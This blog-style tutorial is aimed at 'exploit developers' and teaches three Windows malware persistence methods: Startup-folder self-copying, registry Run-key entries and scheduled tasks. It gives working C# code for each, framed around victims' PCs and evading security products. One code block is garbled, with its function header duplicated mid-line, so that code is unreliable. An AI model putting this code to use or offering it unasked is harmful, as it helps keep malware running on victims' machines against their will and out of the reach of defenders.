Three most powerful malware persistence techniques.

So I have completed analysis of famous exploits and gather some strategies for persistence which they used widely and which are so powerful against security solutions.

Introduction

By keeping your malware OR exploit persistent in victim’s PC actually means If user or system close your malware it will still be running after some time OR even user reboot the system, malware still be running inside system and doing his work. Technically every backdoor, RAT and keyloggers etc use some persistence technique to keep malware running in system for long run. It is not some high rocket science to keep malware persistent in system.

There are plenty of techniques available on cynet, infosecinstitute, lifars and other online sources like GitHub etc. But I will make sure as exploit developer you must be expert in these main three techniques.

As far as detection is concerned we will watch every angle and try to trick the security solutions.

Techniques are arranged as top to bottom, top technique has much lower detection rate.

Startup Folder

Do you know there is a folder inside you windows computer system whom executes everything which is present inside it at every time your PC starts? If yes, Good. If no, you will learn it today. The folder’s path is written following. To check just open command prompt and write “cd” and following path you will be there in startup folder. Or paste following path in window explorer top bar and you will be there.

C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

You may practice it by placing any file inside this folder and restart your PC, at every restart that file will be executed automatically. So we will implement it in C# language and when victim double clicks our executable it will suddenly copy itself to startup folder and you can code any thing after this function. So open your VISUAL STUDIO and create new project in Console App ( .net framework). After giving a name place following function on top of main() function.

If you have any issue in understanding click here for better understanding. This code actually copy itself from own primary location to startup folder by using “xcopy ” command in command prompt.

public static void startuppresis() {
string lo = System.Reflection.Assembly.GetEntryAssembly().Location;
string filename = System.AppDomain.CurrentDomain.FriendlyName;
//Console.WriteLine(lo);
string currnt_user_name = Environment.UserName;
string file = @”C:\Users\” + currnt_user_name + @”\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”+ filename;
string file_loc = @”C:\Users\” + currnt_user_name + @”\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”;
file = “\”” + file + “\””;
file_loc = “\”” + file_loc + “\””;
lo = “\”” + lo + “\””;
if (!File.Exists(file))
{
Process cmd2 = new Process();
cmd2.StartInfo.FileName = “cmd.exe”;
cmd2.StartInfo.RedirectStandardInput = true;
cmd2.StartInfo.RedirectStandardOutput = true;
cmd2.StartInfo.CreateNoWindow = true;
cmd2.StartInfo.UseShellExecute = false;
cmd2.Start();
cmd2.StandardInput.WriteLine(@”C:”);
cmd2.StandardInput.WriteLine(@”cd “ + file_loc + “”);
cmd2.StandardInput.WriteLine(@”xcopy “ + lo + @” “+ filename);
cmd2.StandardInput.WriteLine(@”F”);
cmd2.StandardInput.WriteLine(@”Yes”);
cmd2.StandardInput.Flush();
cmd2.StandardInput.Close();
cmd2.WaitForExit();
Console.WriteLine(cmd2.StandardOutput.ReadToEnd());
}

Then call this function in MAIN() function startuppresis();

Until now you are successful in first persistence just start the project and you will see the same executable will be in your startup folder which will be again executed when you start the PC. Then after startup it inside startup folder then its good otherwise copy itself to startup.

If you are still having issues check here for the solution.

Registry persistence

Registry persistence is also famous in most attacker’s communities. Windows actually checks if there are some registries that are present in registry startup if present then windows execute those paths. So will take advantage of that and misuse it. If you want to see the path this is the path that can be used, you can open it from “registry editor”.

Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

So our C# code will add itself to that specified path in registry all you need to do is just add following function it will add its own exe path in registry startup.

For any issues watch whole project here.

public static void taskprersis() {
string lo = System.Reflection.Assembly.GetEntryAssembly().Location;
RegistryKey add = Registry.CurrentUser.OpenSubKey(“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run”, true);
add.SetValue(“OffensiveAPP”, “\”” + lo + “\””);
}

As you can see at first this path is empty but after I execute the exe path will be added.

Here you can see the path is added when I start exe from public folder and now whenever user start his/her PC this “C:\Users\Public\checkc.exe” will be executed.

Task scheduler persistence

Some attackers recursively calls the executable from task scheduler and this process keep going after even user restart the PC Or even end it from task manager.

So this is function that you need to put above your main function. In case of any issue with code you can check it here.

Our function will create folder “My0ffensiveTasks” in task scheduler and add a task in it which will be executed after every 5 minute.

public static void taskprersis() {
string lo = System.Reflection.Assembly.GetEntryAssembly().Location; public static void taskprersis() {
string lo = System.Reflection.Assembly.GetEntryAssembly().Location;
Process cmd = new Process();
cmd.StartInfo.FileName = “cmd.exe”;
cmd.StartInfo.RedirectStandardInput = true;
cmd.StartInfo.RedirectStandardOutput = true;
cmd.StartInfo.CreateNoWindow = true;
cmd.StartInfo.UseShellExecute = false;
cmd.Start();

cmd.StandardInput.WriteLine(“schtasks /CREATE /sc MINUTE /MO 5 /TN \”My0ffensiveTasks\\newly added task\” /TR \”” + lo + “\””);
cmd.StandardInput.WriteLine(“Y”);
cmd.StandardInput.Flush();
cmd.StandardInput.Close();
cmd.WaitForExit();
Console.WriteLine(cmd.StandardOutput.ReadToEnd());
Console.WriteLine(lo);
}

Just add this code and call this function in main() and run the program in case of issues get guide form here. And after execution you will see a task in “Task scheduler” just like following

References

1. https://ieeexplore.ieee.org/document/9594197
2. https://github.com/white-collor/making-malware-persistence-using-registery
3. https://lazywinadmin.com/2012/03/run-this-task-every-minute.html
4. https://www.windowscentral.com/how-create-task-using-task-scheduler-command-prompt
5. https://github.com/white-collor/malware-persistence-using-task-sheduler-of-windows
6. https://github.com/jhangju